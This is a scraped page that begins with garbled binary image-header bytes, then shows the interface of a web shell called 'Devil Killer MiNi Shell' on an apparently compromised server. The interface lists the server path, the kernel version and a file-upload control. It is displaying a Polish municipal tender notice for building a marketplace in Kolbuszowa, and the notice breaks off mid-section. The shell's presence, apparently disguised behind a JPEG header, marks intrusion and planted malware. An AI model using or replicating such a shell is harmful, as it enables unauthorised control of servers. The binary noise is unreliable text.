JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230427/0019644401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa targowiska miejskiego wraz z infrastrukturą u zbiegu ulic: <br/>Wolskiej oraz Piłsudskiego w Kolbuszowej” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KOLBUSZOWA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690581666</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Obrońców Pokoju 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kolbuszowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@ekolbuszowa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ekolbuszowa.logintrade.net</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa targowiska miejskiego wraz z infrastrukturą u zbiegu ulic: <br/>Wolskiej oraz Piłsudskiego w Kolbuszowej” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-53509291-e4eb-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00196444</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00032724/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Budowa placu targowego przy ulicy Wolskiej w Kolbuszowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.ekolbuszowa.logintrade.net <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.ekolbuszowa.logintrade.net</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się drogą elektroniczną przy użyciu platformyzakupowejPZP24https://ekolbuszowa.logintrade.net<br/>2. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej<br/>przekazywanej przy ich użyciu, opisane zostały w Regulaminie i Instrukcji dostępnych pod adresem<br/>https://ekolbuszowa.logintrade.net<br/>3. Szczegółowe informacje zawarto w rozdziale VIII Instrukcji dla Wykonawców (Rozdział I SWZ).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO do zastosowania przez zamawiających w celu związanym z postępowaniem o udzielenie zamówienia publicznego<br/><br/>1.1.	Zamawiający Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego <br/>i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>1.1.1.	Administratorem Pani/Pana danych osobowych przetwarzanych w Urzędzie Miejskim <br/>w Kolbuszowej jest: Burmistrz Kolbuszowej; ul. Obrońców Pokoju 21, 36-100 Kolbuszowa. <br/>1.1.2.	Inspektorem ochrony danych osobowych w Gminie Kolbuszowa jest Pani: Lucyna Wyka<br/>ul. Piekarska 15<br/>36-100 Kolbuszowa <br/>Tel. 17 2271 333 wew. 424<br/>e-mail: rodo@ekolbuszowa.pl<br/>1.1.3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO <br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego:<br/>„Budowa targowiska miejskiego wraz z infrastrukturą u zbiegu ulic: <br/>Wolskiej oraz Piłsudskiego w Kolbuszowej” realizowana w ramach inwestycji pn.: <br/>Budowa placu targowego przy ulicy Wolskiej w Kolbuszowej.<br/>numer referencyjny nadany sprawie: ZP.271.1.20.2023<br/>prowadzonym w trybie: podstawowym<br/>1.1.4.	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (t.j. Dz. U. z 2019 r. poz. 1843)., dalej „ustawa Pzp”; <br/>1.1.5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>1.1.6.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym <br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>1.1.7.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>1.1.8.	Posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>1.1.9.	Nie przysługuje Pani/Panu:<br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>1.2.	Wykonawca zobowiązany jest wypełnić obowiązek informacyjny przewidziany w art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym postępowaniu, a także w trakcie realizacji umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.20.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja zadania pn.: „Budowa targowiska miejskiego wraz z infrastrukturą u zbiegu ulic: Wolskiej oraz Piłsudskiego w Kolbuszowej” realizowana w ramach inwestycji pn.: Budowa placu targowego przy ulicy Wolskiej w Kolbuszowej<br/><br/>Zakres zamówienia obejmuje:<br/><br/>„Budowie targowiska otwartego (we wschodniej części placu) z częścią zadaszoną ok 650 m2 (w pd.-zach. części placu) wraz z układem komunikacji wewnętrznej z zapewnieniem wód opadowych do kanalizacji deszczowej, utwardzenie terenu kostką brukową, oświetlenie, miejsca postojowe dla klientów, w tym dla osób niepełnosprawnych, powstanie budynku/kontenera sanitarnego ogólnodostępnego, pełniącego funkcje szalet, z przystosowaniem dla potrzeb osób niepełnosprawnych o ograniczonej zdolności poruszania się oraz pomieszczenia gospodarczego z ujęciem wody, dla potrzeb bieżącej obsługi placu targowego i możliwością przechowywania narzędzi porządkowych do utrzymania czystości” na podstawie:<br/>- posiadanego Programu Funkcjonalno-Użytkowego dla zadania „Budowa targowiska miejskiego wraz z infrastrukturą u zbiegu ulic: Wolskiej oraz Piłsudskiego w Kolbuszowej”,<br/>- karty informacyjnej przedsięwzięcia pn. : „Budowa targowiska miejskiego wraz z infrastrukturą u zbiegu ulic: Wolskiej oraz Piłsudskiego w Kolbuszowej”.<br/>- decyzji o środowiskowych uwarunkowaniach dla przedsięwzięcia pn.: „Budowa targowiska miejskiego wraz z infrastrukturą u zbiegu ulic: Wolskiej oraz Piłsudskiego w Kolbuszowej” znak OŚiGW.6220.2.20.2022 z dnia 16.11.2022r.<br/><br/>Termin przedłożenia projektu wstępnego (koncepcji) Zamawiającemu - do 30 dni od podpisania umowy.<br/><br/>Uwaga: inwestycja będzie realizowana w dwóch etapach (zakres etapów został przedstawiony w części rysunkowej oraz opisie stanowiącym załącznik do PFU).<br/>II.	Opracowanie dokumentacji projektowej:<br/>Zakres prac będzie obejmował:<br/>- uzyskanie decyzji o lokalizacji celu publicznego,<br/>- pozyskanie i weryfikacja wszystkich danych niezbędnych do prawidłowego zaprojektowania i wykonania przedmiotu zamówienia;<br/> - opracowanie projektu budowlanego zawierającego: projekt zagospodarowania działki lub terenu oraz projekt architektoniczno-budowlany - ilość egzemplarzy w zakresie wystarczającym do uzyskania decyzji o pozwoleniu na budowę + 1 egzemplarz dla Zamawiającego;<br/>- wykonanie pomiarów geodezyjnych i map do celów projektowych;<br/>- wykonanie badań geologicznych i dokumentacji geologiczno - inżynierskiej (według potrzeb);<br/>- wykonanie projektu przebudowy zjazdu w części północnej terenu inwestycji oraz projektu organizacji ruchu wraz z uzgodnieniem przez właściwe organy przed przystąpieniem do robót,<br/>- uzyskanie decyzji o pozwoleniu na budowę;<br/>- opracowanie projektów technicznych - przed złożeniem zgłoszenia o rozpoczęciu robót do Nadzoru Budowlanego - ilość egzemplarzy zgodnie z Ustawą Prawo Budowlane <br/>+ 1 egzemplarze dla Zamawiającego;<br/>- opracowanie projektów wykonawczych – w ilości 3 egzemplarzy;<br/>- zapewnienie nadzoru autorskiego w całym okresie realizacji robót;<br/>- uzyskanie innych decyzji, opinii, wykonanie niezbędnych opracowań do złożenia wniosku o wydanie decyzji o pozwoleniu na budowę lub do zgłoszenia robót budowlanych.<br/><br/>Uwaga: Zakres dokumentacji projektowej powinien uwzględniać etapowanie inwestycji stosownie do zakresu robót wydzielonych w PFU prace projektowe dotyczą realizacji całości przedsięwzięcia.<br/><br/>	III. Wykonanie robót budowlanych<br/>Przedmiotem zamówienia jest wykonanie robót przygotowawczych, budowlanych oraz innych niezbędnych czynności prowadzących do zrealizowania inwestycji p.n.: „Budowa targowiska miejskiego wraz z infrastrukturą u zbiegu ulic: Wolskiej oraz Piłsudskiego w Kolbuszowej” – dla etapu I zgodnie z Programem Funkcjonalno - Użytkowym oraz opracowanym i zatwierdzonym projektem budowlanym i technicznym.<br/>Szczegółowy opis przedmiotu Zamówienia przedstawiony został w Programie Funkcjonalno-Użytkowym oraz w Specyfikacjach Technicznych Wykonania i Odbioru Robót Budowlanych.<br/>Obiekty targowiska objęte zakresem budowy:<br/>L.p.	OBIEKTY REALIZOWANE W ETAPIE I <br/>Budowy targowiska miejskiego wraz z infrastrukturą <br/>u zbiegu ulic: Wolskiej oraz Piłsudskiego w Kolbuszowe	ZAKRES ROBÓT<br/>1. Przygotowanie terenu, roboty instalacyjne: <br/>- elektryczne – linie kablowe, ułożenie rur osłonowych<br/>- sanitarne - kanalizacja deszczowa, wodociąg, kanalizacja sanitarna.	Budowa nowego obiektu<br/>2. Kontener sanitarny wraz z infrastrukturą , w tym:<br/>Przyłącz kanalizacji sanitarnej, deszczowej, wodociągowej oraz elektrycznej.	Budowa nowego obiektu<br/>3. Wykonanie placów, dojść, dojazdów utwardzonych kostką betonową, budową 8szt miejsc postojowych w tym 2 dla niepełnosprawnych we wschodniej części placu wraz z oznakowaniem poziomym i pionowym.	Budowa nowego obiektu<br/>4. Przebudowa zjazdu z ul. Wolskiej w północnej części placu.	Budowa nowego obiektu<br/>5. Nasadzenia z zieleni na placu głównym w centralnej części oraz w obrębie kontenera sanitarnego, montaż elementów małej architektury ławki, kosze.	Budowa nowego obiektu<br/>6. Wykonanie placów poza komunikacją z kostki nawierzchnią ulepszoną pozyskaną na miejscu z korytowania wraz z wyrównaniem.	Budowa nowego obiektu<br/><br/>Wykonawca może przystąpić do wykonania robót budowlanych nie wcześniej niż po uzgodnieniu koncepcji przez Zamawiającego. W przypadku robót wymagających uzyskania pozwolenia na budowę lub zgłoszenia robót budowlanych nie wcześniej niż po dopełnieniu niezbędnych formalności dla danej procedury. <br/><br/>Uwaga: Zakres robót budowlanych dotyczy wykonania I etapu. Realizacja części przedsięwzięcia powinna dać możliwość użytkowania targowiska zgodnie z przeznaczeniem. Wykonawca sporządzi dokumentacje powykonawczą w celu uzyskania częściowego pozwolenia na użytkowanie.<br/><br/>Zakres czynności obejmuje m.in.:<br/>- sporządzenie harmonogramu całości robót objętych umową, którego wydzieloną częścią będzie szczegółowy harmonogram realizacji inwestycji;<br/>- sporządzenie planu bezpieczeństwa i ochrony zdrowia;<br/>- sporządzenie programu zapewnienia jakości;<br/>- zorganizowanie i utrzymanie zaplecza budowy;<br/>- realizację dostaw urządzeń, łącznie z transportem na teren budowy;<br/>- zapewnienie pełnej obsługi geodezyjnej w czasie robót w tym wykonanie dokumentacji geodezyjnej powykonawczej;<br/>- wywóz, zagospodarowanie lub utylizacja odpadów powstałych w związku z prowadzonymi robotami;<br/>- zorganizowanie i przeprowadzenie prób, badań i odbiorów;<br/>- sporządzenie dokumentacji powykonawczej;<br/>- uporządkowanie i odtworzenie terenu po zakończeniu budowy;<br/>- przygotowanie dokumentów związanych z oddaniem obiektów do użytkowania, uzyskanie pozwolenia na użytkowanie;<br/>Wykonawca ma możliwość odwiedzenia i sprawdzenia miejsca robót oraz jego otoczenia w celu oceny, na własną odpowiedzialność, koszt i ryzyko, czynników koniecznych do przygotowania jego oferty i podpisania umowy w niniejszym Postępowaniu.<br/>Zamawiający wymaga, że jeśli konieczne będzie przeprowadzenie działań niewymienionych <br/>w Programie Funkcjonalno-Użytkowym, a koniecznych dla prawidłowego przeprowadzenia robót projektowych lub inwestycyjnych, to Wykonawca musi je uznać za włączone zarówno do zakresu umowy jak i do zatwierdzonej ceny umownej. Koszt wszystkich takich prac Wykonawca ujmie na własne ryzyko w cenie oferty.<br/><br/>UWAGA: Jeżeli SWZ lub załączniki do SWZ w tym dokumentacja projektowa lub specyfikacja techniczna wykonania i odbioru robót wskazywałaby w odniesieniu do niektórych materiałów i urządzeń znaki towarowe, pochodzenie, normy aprobaty techniczne, patenty, Zamawiający zgodnie z art. 99 ust 5 ustawy PZP dopuszcza składania „ produktów równoważnych”. Wszelkie „produkty” pochodzące od konkretnych producentów, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać towary, aby spełnić wymagania stawiane przez Zamawiającego i stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia. Poprzez zapis dotyczący minimalnych wymagań parametrów jakościowych, Zamawiający rozumie wymagania towarów zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów. Operowanie przykładowymi nazwami producenta, ma jedynie na celu doprecyzowanie poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania. Tak więc posługiwanie się nazwami producentów/produktów ma wyłącznie charakter przykładowy. Zamawiający, przy opisie przedmiotu zamówienia, wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt dopuszcza jednocześnie produkty równoważne o parametrach jakościowych i użytkowych. Materiały równoważne muszą być w ofercie wymienione z nazwy, a ciężar udowodnienia o zachowaniu parametrów wymaganych przez Zamawiającego leży po stronie składającego ofertę. <br/>Materiały równoważne w żadnym stopniu nie mogą obniżyć standardu i nie mogą zmienić zasad oraz rozwiązań technicznych przyjętych w dokumentacji projektowej, a tym samym nie mogą powodować konieczności przeprojektowania jakichkolwiek elementów, ani nie mogą pozbawiać Użytkownika żadnych wydajności, funkcjonalności, użyteczności opisanych lub wynikających z dokumentacji projektowej. Wykonawca składający ofertę równoważną będzie zobowiązany do udowodnienia zamawiającemu, że oferowane przez niego urządzenia lub materiały są równoważne w stosunku do zaproponowanych w projekcie. Wykonawca przedstawi niezbędne informacje dotyczące przyjętych do oferty materiałów potwierdzające równoważność oferowanych urządzeń w stosunku do zaproponowanych w projekcie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45113000-2 - Roboty na placu budowy</p> <p class="mb-0">45213142-0 - Roboty budowlane w zakresie targowisk na wolnym powietrzu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">450 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">1.	Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7) udzielenia, <br/>w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług lub robót budowlanych, zamówienia polegającego na powtórzeniu podobnych usług lub robót budowlanych do 10%, jeżeli takie zamówienie było przewidziane w ogłoszeniu o zamówieniu <br/>dla zamówienia podstawowego i jest zgodne z jego przedmiotem oraz całkowita wartość tego zamówienia została uwzględniona przy obliczaniu jego wartości.<br/>2.	Powtórzenie podobnych robót budowlanych do wysokości 10% zamówienia podstawowego.<br/>Zakres robót podobnych:<br/>a.	Zakres robót: roboty ziemne i montażowe, roboty polegające na budowie nowych obiektów budowlanych, <br/>b.	Zakres usług: prace projektowe, <br/>3.	Warunki, na jakich zostanie udzielone zamówienie: <br/>1)	W prowadzonym postępowaniu na podstawie art. 214 ust 1 pkt 7) Zamawiający będzie wprowadzał podstawy wykluczenia z postępowania identyczne z tymi, które stosował <br/>w pierwotnym przetargu łącznie z takimi samymi dokumentami na potwierdzenie ich spełnienia, tzn. wymienione w rozdziale 15, 19<br/>2)	Obowiązywać będą te same zasady dotyczące podwykonawstwa.<br/>3)	Terminy płatności i zasady rozliczeń nie będą modyfikowane w stosunku i proporcji <br/>do pierwotnego zamówienia i umowy.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria wyboru ofert określono w Instrukcji dla Wykonawców (Rozdział<br/>I SWZ)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">45,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">podział ceny ofertowej brutto</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> 